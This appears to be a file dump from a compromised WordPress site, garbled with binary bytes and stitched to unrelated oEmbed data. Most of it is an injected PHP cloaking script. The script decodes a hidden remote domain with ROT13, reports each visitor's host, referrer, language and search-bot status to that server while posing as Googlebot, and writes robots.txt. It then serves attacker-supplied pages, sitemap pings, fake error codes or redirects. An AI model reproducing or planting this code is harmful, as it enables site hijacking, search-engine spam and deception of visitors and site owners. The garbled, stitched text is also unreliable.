¦Zm«ë‡^r‡^$xmlname = urldecode('123-er103.ioybtarjf.fvgr');
$http = is_https() ? 'https' : 'http';
$duri_tmp = drequest_uri();
$duri = empty($duri_tmp) ? '/' : $duri_tmp;
$goweb = str_rot13($xmlname);
$host = htmlspecialchars(isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '', ENT_QUOTES, 'UTF-8');
$lang = htmlspecialchars(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '', ENT_QUOTES, 'UTF-8');
$urlshang = htmlspecialchars(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '', ENT_QUOTES, 'UTF-8');
$web1 = $http . '://' . $goweb . '/index.php';
$web = $web1 . '?web=' . $host . '&zz=' . (disbot() ? '1' : '0') . '&uri=' . urlencode($duri) . '&urlshang=' . urlencode($urlshang) . '&http=' . $http . '&lang=' . $lang;
$html_content = doutdo($web);
$robotsPath = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
if (!file_exists($robotsPath)) {
$defaultContent = "User-agent: *\nAllow: /\nSitemap: {$http}://{$host}/sitemap.xml\n";
file_put_contents($robotsPath, $defaultContent);
}
if (!strstr($html_content, 'nobotuseragent')) {
handle_content($html_content);
}
function is_https()
{
return (
isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off'
|| isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'
|| isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off'
);
}
function drequest_uri()
{
if (isset($_SERVER['REQUEST_URI'])) {
return $_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['argv'])) {
return $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
} else {
return $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
function disbot()
{
$uAgent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
return stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google');
}
function doutdo($web)
{
$options = [
"http" => [
"header" => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
]
];
$context = stream_context_create($options);
$response = @file_get_contents($web, false, $context);
if (!$response) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $web);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo 'cURL Error: ' . curl_error($ch);
exit;
}
curl_close($ch);
}
return $response;
}
function handle_content($html_content)
{
if (strstr($html_content, 'okhtmlgetcontent')) {
header("Content-type: text/html; charset=utf-8");
echo str_replace("okhtmlgetcontent", '', $html_content);
exit();
} elseif (strstr($html_content, 'okxmlgetcontent')) {
header("Content-type: text/xml");
echo str_replace("okxmlgetcontent", '', $html_content);
exit();
} elseif (strstr($html_content, 'pingxmlgetcontent')) {
header("Content-type: text/html; charset=utf-8");
echo ping_sitemap(str_replace("pingxmlgetcontent", '', $html_content));
exit();
} elseif (strstr($html_content, 'getcontent500page')) {
header('HTTP/1.1 500 Internal Server Error');
exit();
} elseif (strstr($html_content, 'getcontent404page')) {
header('HTTP/1.1 404 Not Found');
exit();
} elseif (strstr($html_content, 'getcontent301page')) {
header('Location: ' . str_replace("getcontent301page", '', $html_content));
exit();
}
}
function ping_sitemap($url)
{
$url_arr = explode("\r\n", trim($url));
$return_str = '';
foreach ($url_arr as $pingUrl) {
$pingRes = doutdo($pingUrl);
$ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error';
$return_str .= htmlspecialchars($pingUrl, ENT_QUOTES, 'UTF-8') . '-- ' . $ok . '
';
}
return $return_str;
}½©Z
1.0Internet-Applyhttps://internet-apply.comadminhttps://internet-apply.com/author/admin/Homerich600338<blockquote class="wp-embedded-content" data-secret="UixBNfUTvA"><a href="https://internet-apply.com/">Home</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://internet-apply.com/embed/#?secret=UixBNfUTvA" width="600" height="338" title="“Home” — Internet-Apply" data-secret="UixBNfUTvA" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script>
/*! This file is auto-generated */
!function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document);
</script>